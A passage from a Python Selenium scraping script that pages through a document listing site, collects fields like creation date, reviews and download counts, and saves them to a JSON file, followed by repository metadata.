y.find_elements_by_class_name('txt_note')[1].text,\n \"dateCreate\": y.find_elements_by_class_name('txt_note')[2].text,\n \"review\": y.find_elements_by_class_name('txt_note')[3].text,\n \"downloaded\": y.find_elements_by_class_name('txt_note')[4].text\n }\n listOfDocuments.append(term)\n try:\n if(count >= 3000):\n condition = False\n # if(lastPage == checkPage):\n # condition = False\n checkPage.find_element_by_class_name('bor_none').click()\n except:\n condition = False\nprint(len(listOfDocuments))\nwith open('data.json', 'w', encoding='utf-8') as f:\n json.dump(listOfDocuments, f, ensure_ascii=False, indent=4)\n\nsleep(5)\n","repo_name":"sttinh99/crawling","sub_path":"crawling.py","file_name":"crawling.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}